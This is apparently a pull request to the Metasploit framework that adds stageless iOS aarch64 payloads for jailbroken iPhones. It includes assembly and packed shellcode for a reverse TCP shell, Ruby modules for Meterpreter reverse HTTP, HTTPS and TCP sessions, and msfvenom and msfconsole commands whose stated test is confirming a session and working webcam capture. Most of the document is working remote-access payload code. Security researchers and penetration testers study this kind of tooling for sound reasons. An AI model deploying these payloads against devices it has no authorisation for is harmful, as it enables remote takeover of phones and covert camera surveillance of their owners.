### PR TITLE
iOS meterpreter

### DIFF
--- a/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
+++ b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
@@ -1,0 +1,72 @@
+.equ SYS_SOCKET, 0x61
+.equ SYS_CONNECT, 0x62
+.equ SYS_DUP2, 0x5a
+.equ SYS_EXECVE, 0x3b
+.equ SYS_EXIT, 0x01
+
+.equ AF_INET, 0x2
+.equ SOCK_STREAM, 0x1
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+.equ IP, 0x0100007f
+.equ PORT, 0x5C11
+
+_start:
+        // sockfd = socket(AF_INET, SOCK_STREAM, 0)
+        mov    x0, AF_INET
+        mov    x1, SOCK_STREAM
+        mov    x2, 0
+        mov    x16, SYS_SOCKET
+        svc    0
+        mov    x3, x0
+
+        // connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
+        adr    x1, sockaddr
+        mov    x2, 0x10
+        mov    x16, SYS_CONNECT
+        svc    0
+        cbnz   w0, exit
+
+        // dup2(sockfd, STDIN) ...
+        mov    x0, x3
+        mov    x2, 0
+        mov    x1, STDIN
+        mov    x16, SYS_DUP2
+        svc    0
+        mov    x1, STDOUT
+        mov    x16, SYS_DUP2
+        svc    0
+        mov    x1, STDERR
+        mov    x16, SYS_DUP2
+        svc    0
+
+        // execve('/system/bin/sh', NULL, NULL)
+        adr    x0, shell
+        mov    x2, 0
+        str    x0, [sp, 0]
+        str    x2, [sp, 8]
+        mov    x1, sp
+        mov    x16, SYS_EXECVE
+        svc    0
+
+exit:
+        mov    x0, 0
+        mov    x16, SYS_EXIT
+        svc    0
+
+.balign 4
+sockaddr:
+        .short AF_INET
+        .short PORT
+        .word  IP
+
+shell:
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+end:
+

--- a/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb
+++ b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'apple_ios'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+

--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -560,4 +560,12 @@ class Msf::Module::Platform
     Alias = "hardware"
   end
 
+  #
+  # Apple iOS
+  #
+  class Apple_iOS < Msf::Module::Platform
+    Rank = 100
+    Alias = "apple_ios"
+  end
+
 end

--- a/lib/msf/core/payload/uuid.rb
+++ b/lib/msf/core/payload/uuid.rb
@@ -72,7 +72,8 @@ class Msf::Payload::UUID
     21 => 'python',
     22 => 'nodejs',
     23 => 'firefox',
-    24 => 'r'
+    24 => 'r',
+    25 => 'apple_ios',
   }
 
   # The raw length of the UUID structure

--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'BadChars'    => '',
             'DisableNops' => true
           },
-        'Platform'       => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
+        'Platform'       => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
         'Arch'           => ARCH_ALL,
         'Targets'        => [ [ 'Wildcard Target', {} ] ],
         'DefaultTarget'  => 0,

--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
@@ -1,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'http',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
@@ -1,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTPS Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttps,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'https',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
@@ -1,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'tcp',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb
@@ -1,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 152
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Apple iOS aarch64 Command Shell, Reverse TCP Inline',
+      'Description'   => 'Connect back to attacker and spawn a command shell',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'apple_ios',
+      'Arch'          => ARCH_AARCH64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LHOST'    => [ 132, 'ADDR' ],
+              'LPORT'    => [ 130, 'n' ],
+            },
+          'Payload' =>
+            [
+            # Generated from external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s
+            0xd2800040,          #  mov	x0, #0x2                   	// #2
+            0xd2800021,          #  mov	x1, #0x1                   	// #1
+            0xd2800002,          #  mov	x2, #0x0                   	// #0
+            0xd2800c30,          #  mov	x16, #0x61                  	// #97
+            0xd4000001,          #  svc	#0x0
+            0xaa0003e3,          #  mov	x3, x0
+            0x10000341,          #  adr	x1, 80 <sockaddr>
+            0xd2800202,          #  mov	x2, #0x10                  	// #16
+            0xd2800c50,          #  mov	x16, #0x62                  	// #98
+            0xd4000001,          #  svc	#0x0
+            0x35000260,          #  cbnz	w0, 74 <exit>
+            0xaa0303e0,          #  mov	x0, x3
+            0xd2800002,          #  mov	x2, #0x0                   	// #0
+            0xd2800001,          #  mov	x1, #0x0                   	// #0
+            0xd2800b50,          #  mov	x16, #0x5a                  	// #90
+            0xd4000001,          #  svc	#0x0
+            0xd2800021,          #  mov	x1, #0x1                   	// #1
+            0xd2800b50,          #  mov	x16, #0x5a                  	// #90
+            0xd4000001,          #  svc	#0x0
+            0xd2800041,          #  mov	x1, #0x2                   	// #2
+            0xd2800b50,          #  mov	x16, #0x5a                  	// #90
+            0xd4000001,          #  svc	#0x0
+            0x10000180,          #  adr	x0, 88 <shell>
+            0xd2800002,          #  mov	x2, #0x0                   	// #0
+            0xf90003e0,          #  str	x0, [sp]
+            0xf90007e2,          #  str	x2, [sp,#8]
+            0x910003e1,          #  mov	x1, sp
+            0xd2800770,          #  mov	x16, #0x3b                  	// #59
+            0xd4000001,          #  svc	#0x0
+            0xd2800000,          #  mov	x0, #0x0                   	// #0
+            0xd2800030,          #  mov	x16, #0x1                   	// #1
+            0xd4000001,          #  svc	#0x0
+            0x5c110002,          #  .word	0x5c110002
+            0x0100007f,          #  .word	0x0100007f
+            0x00000000,          #  .word	0x00000000                // shell
+            0x00000000,          #  .word	0x00000000
+            0x00000000,          #  .word	0x00000000
+            0x00000000,          #  .word	0x00000000
+            ].pack("V*")
+        }
+      ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),
+      ])
+  end
+
+  def generate
+    p = super
+
+    sh = datastore['SHELL']
+    if sh.length >= 16
+      raise ArgumentError, "The specified shell must be less than 16 bytes."
+    end
+    p[136, sh.length] = sh
+
+    p
+  end
+end

--- a/tools/modules/generate_mettle_payloads.rb
+++ b/tools/modules/generate_mettle_payloads.rb
@@ -25,6 +25,7 @@ arches = [
   ['x86',       'Linux', 'i486-linux-musl'],
   ['zarch',     'Linux', 's390x-linux-musl'],
   ['x64',       'OSX',   'x86_64-apple-darwin'],
+  ['aarch64',   'Apple_iOS',   'aarch64-iphone-darwin'],
 ]
 
 arch = ''
@@ -42,7 +43,7 @@ arches.each do |a, pl, pa|
 
     template = File::read(File::join(cwd, "meterpreter_reverse.erb"))
     renderer = ERB.new(template)
-    filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb")
+    filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb")
     File::write(filename, renderer.result())
   end
 end


### PR DESCRIPTION
This change includes a few changes needed to get a working iOS meterpreter stageless payload. Currently you'll need to run it on a jailbroken arm64 iPhone (e.g 5S+).
Unless I've done something stupid locally the current mettle payload gem includes a working binary already, so no mettle payload update is needed.

## Verification

- [x]  `msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out`
- [x]  `msfconsole -qx "use exploit/multi/handler; set payload apple_ios/aarch64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `chmod +x out`
- [x] `brew install ldid`
- [x] `ldid -S out`
- [x] Transfer it to the jailbroken device and run it (via ssh)
- [x] **Verify** you get a session
- [x] **Verify** webcam_stream/snap works

## TODO

- [ ] Documentation